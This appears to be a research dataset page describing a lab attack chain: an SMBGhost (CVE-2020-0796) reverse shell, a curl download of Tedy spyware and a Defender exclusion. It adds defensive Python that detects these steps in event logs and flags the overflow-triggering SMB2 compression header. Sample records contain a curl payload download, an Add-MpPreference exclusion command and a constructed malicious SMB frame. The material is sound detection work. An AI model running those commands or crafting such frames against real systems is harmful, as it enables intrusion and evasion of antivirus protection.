T7-24-02-M-NE-CDEGLN
SMBGhost + Tedy Spyware
This attack chains T2-24-01-S-N-CL and T6-24-02-S-E-DEGN. Two logs are collected: a pcap and a Windows event log (evtx).
1. Reverse shell connection by exploiting the SMBGhost vulnerability
2. Download of the spyware from a malware hosting server and execution on the victim
3. Change of system settings and information collection with a PowerShell script
The attacker obtains a reverse shell through the Windows 10 SMBv3 vulnerability (SMBGhost, CVE-2020-0796) using the T2-24-01-S-N-CL attack. From that shell the attacker downloads and executes Tedy Spyware with curl commands, as in T6-24-02-S-E-DEGN. To evade detection by Windows Defender, the spyware runs PowerShell scripts that change system settings, add a Defender exclusion for the spyware itself, and gather information from the host.
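The three steps above leave host-side traces that the collected evtx can be checked for: a downloader writing a file to disk, a Defender exclusion being added, PowerShell discovery commands, and the downloaded file later starting as a process. The following Python is an added example and is not part of the dataset or its run.py tooling. It runs simple rules over constructed records shaped like Security 4688 (process creation) and PowerShell/Operational 4104 (script block) events and correlates a curl download with the later execution of the file it wrote. The file name tedy.exe, the download URL, the 192.168.56.1:8000 hosting server and the exact PowerShell commands are assumptions; the page does not show the dataset's actual command lines.

```python
import re
from typing import Dict, List

# Detection rules: (rule name, ATT&CK tactic, pattern). The command forms are
# assumptions about how the steps on the page would appear in a log; the page
# does not show the dataset's actual command lines.
DOWNLOAD_RX = re.compile(
    r"(?:\bcurl(?:\.exe)?\b.*\s-(?:o|-output)\b|\bInvoke-WebRequest\b.*-OutFile\b)", re.I)
RULES = [
    ("download_to_disk", "Command and Control", DOWNLOAD_RX),
    ("defender_exclusion_or_disable", "Defense Evasion", re.compile(
        r"\b(?:Add|Set)-MpPreference\b.*-(?:Exclusion(?:Path|Process|Extension)|DisableRealtimeMonitoring)\b",
        re.I)),
    ("host_information_collection", "Discovery", re.compile(
        r"\b(?:Get-ComputerInfo|systeminfo|Get-NetIPConfiguration|Get-CimInstance|Get-WmiObject)\b", re.I)),
]
# Captures the path a download command writes to, so a later execution can be correlated.
OUTPUT_PATH_RX = re.compile(r"(?:\s-(?:o|-output)|-OutFile)\s+[\"']?([^\s\"']+)", re.I)

# Constructed sample events (not taken from the dataset). event_id 4688 = process
# creation with command line; 4104 = PowerShell script block text.
SAMPLE_EVENTS = [
    {"event_id": 4688, "process": "cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"event_id": 4688, "process": "curl.exe",
     "command_line": "curl http://192.168.56.1:8000/tedy.exe -o C:\\Users\\Public\\tedy.exe"},
    {"event_id": 4104, "process": "powershell.exe",
     "script_block": "Add-MpPreference -ExclusionPath 'C:\\Users\\Public'"},
    {"event_id": 4104, "process": "powershell.exe",
     "script_block": "Get-ComputerInfo | Out-File C:\\Users\\Public\\info.txt"},
    {"event_id": 4688, "process": "tedy.exe",
     "command_line": "C:\\Users\\Public\\tedy.exe"},
]


def _text(event: Dict) -> str:
    """Field holding the command text, whichever record type this is."""
    return event.get("command_line") or event.get("script_block") or ""


def scan_events(events: List[Dict]) -> List[Dict]:
    """Apply the rules in log order and correlate downloads with later executions.

    Returns one finding per (event, rule) match; a process-creation event whose
    command line names a path an earlier download wrote is flagged as Execution.
    """
    findings = []
    downloaded_paths = set()
    for idx, event in enumerate(events):
        text = _text(event)
        for name, tactic, rx in RULES:
            if rx.search(text):
                findings.append({"event": idx, "rule": name, "tactic": tactic})
        if DOWNLOAD_RX.search(text):
            m = OUTPUT_PATH_RX.search(text)
            if m:
                downloaded_paths.add(m.group(1).lower())
            continue  # the download event itself is not an execution of the file
        if event.get("event_id") == 4688:
            lowered = text.lower()
            if any(path in lowered for path in downloaded_paths):
                findings.append({"event": idx, "rule": "downloaded_file_executed",
                                 "tactic": "Execution"})
    return findings


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The correlation step is what ties the T6 part of the chain together: a curl run and a new process are each unremarkable on their own, but a process started from the path that curl just wrote, shortly after a Defender exclusion for that directory, is the sequence the page describes. Real evtx records would be read with an EVTX parser and mapped onto the same dictionary shape.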
Host      OS          IP              Software
Attacker  Windows 11  192.168.56.1    -
Victim    Windows 10  192.168.56.112  SMB
Log collection time: 170 sec
Program runtime: 200 sec
Installing
python3 -m pip install -r requirements.txt
Using
python3 run.py
MITRE ATT&CK Framework
Attack Tactic
Reconnaissance
Resource Development
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
Logs
./log/2024_02_T7_{time}.pcap # YYmmdd_HHMMSS
./log/2024_02_T7_{time}.evtx # YYmmdd_HHMMSS
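The SMBGhost step in the pcap shows up as an SMB2 message that begins with the compression transform header (ProtocolId 0xFC 'S' 'M' 'B') rather than the normal 0xFE 'S' 'M' 'B' header. The following Python is an added example, not part of the dataset tooling or of the ZecOps PoC cited below. It strips the direct-TCP (port 445) transport header, parses the 16-byte COMPRESSION_TRANSFORM_HEADER from MS-SMB2 section 2.2.42, and flags the condition CVE-2020-0796 abuses: OriginalCompressedSegmentSize + Offset wrapping a 32-bit integer, which the vulnerable srv2.sys decompression routine (Srv2DecompressData) did not check before sizing its buffer. The frames used here are constructed; the specific field values are assumptions and are not taken from the dataset's capture.

```python
import struct

SMB2_COMPRESSION_MAGIC = b"\xfcSMB"   # ProtocolId of a compressed SMB2 message
SMB2_PLAIN_MAGIC = b"\xfeSMB"         # ProtocolId of an ordinary SMB2 header
COMPRESSION_ALGORITHMS = {0: "NONE", 1: "LZNT1", 2: "LZ77", 3: "LZ77+Huffman", 4: "Pattern_V1"}
SMB2_COMPRESSION_FLAG_CHAINED = 0x0001
U32_MAX = 0xFFFFFFFF


def strip_nbss(payload: bytes) -> bytes:
    """Strip the 4-byte direct-TCP transport header: a zero byte plus a 24-bit big-endian length."""
    if len(payload) < 4 or payload[0] != 0:
        raise ValueError("not an SMB direct-TCP frame")
    length = int.from_bytes(payload[1:4], "big")
    if len(payload) - 4 < length:
        raise ValueError("truncated frame")
    return payload[4:4 + length]


def parse_compression_header(msg: bytes) -> dict:
    """Parse the 16-byte COMPRESSION_TRANSFORM_HEADER (MS-SMB2 2.2.42), little-endian."""
    if len(msg) < 16:
        raise ValueError("message shorter than a compression header")
    proto, orig_size, alg, flags, offset_or_len = struct.unpack("<4sIHHI", msg[:16])
    if proto != SMB2_COMPRESSION_MAGIC:
        raise ValueError("not a compressed SMB2 message")
    return {
        "original_size": orig_size,
        "algorithm": COMPRESSION_ALGORITHMS.get(alg, f"unknown(0x{alg:04x})"),
        "chained": bool(flags & SMB2_COMPRESSION_FLAG_CHAINED),
        "offset": offset_or_len,   # Offset for the unchained form, Length for the chained form
        "payload_len": len(msg) - 16,
    }


def is_smbghost_trigger(msg: bytes) -> bool:
    """True when OriginalCompressedSegmentSize + Offset does not fit in 32 bits.

    The vulnerable server added the two fields as 32-bit values without an
    overflow check and allocated a buffer of the wrapped (too small) size, so the
    later copy of the uncompressed data overran it.
    """
    hdr = parse_compression_header(msg)
    if hdr["chained"]:
        return False   # chained form carries Length, not Offset; not covered by this check
    return hdr["original_size"] + hdr["offset"] > U32_MAX


def make_compressed_frame(orig_size: int, algorithm: int, flags: int, offset: int, body: bytes) -> bytes:
    """Constructed test frame: transport header + compression header + body (not dataset data)."""
    hdr = struct.pack("<4sIHHI", SMB2_COMPRESSION_MAGIC, orig_size, algorithm, flags, offset)
    msg = hdr + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


# Constructed samples. MALICIOUS_FRAME uses an assumed wrap-around pair (0xFFFFFFFF + 0x10).
BENIGN_FRAME = make_compressed_frame(0x100, 1, 0, 0, b"\x00" * 16)
MALICIOUS_FRAME = make_compressed_frame(0xFFFFFFFF, 1, 0, 0x10, b"\x41" * 16)
PLAIN_FRAME = b"\x00" + (64).to_bytes(3, "big") + SMB2_PLAIN_MAGIC + b"\x00" * 60


def classify(frame: bytes) -> str:
    """Label one port-445 TCP payload: not-compressed, compressed-ok or smbghost-trigger."""
    msg = strip_nbss(frame)
    try:
        parse_compression_header(msg)
    except ValueError:
        return "not-compressed"
    return "smbghost-trigger" if is_smbghost_trigger(msg) else "compressed-ok"


if __name__ == "__main__":
    for name, frame in (("benign", BENIGN_FRAME), ("malicious", MALICIOUS_FRAME), ("plain", PLAIN_FRAME)):
        print(name, classify(frame))
```

To apply this to the dataset's pcap, feed each port-445 TCP payload from the attacker to the victim through classify(); a patched server rejects such a message, so on an exploited host the trigger frame is followed by the reverse-shell traffic of step 1 rather than by an SMB error response.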
References
[1] NIST, CVE-2020-0796
[2] ZecOps, CVE-2020-0796 Remote Code Execution POC
[3] ESTSECURITY, No.181 2024.10 ESRC Security Trend Report
[4] VirusTotal, 28AB56D70469C88E4DDE1241C1A2F742202757D4C7AC5259C4308DDD74337045
[5] CTX, 28AB56D70469C88E4DDE1241C1A2F742202757D4C7AC5259C4308DDD74337045
Copyright(C) 2024, KAIST Cyber Security Research Center. All Rights Reserved.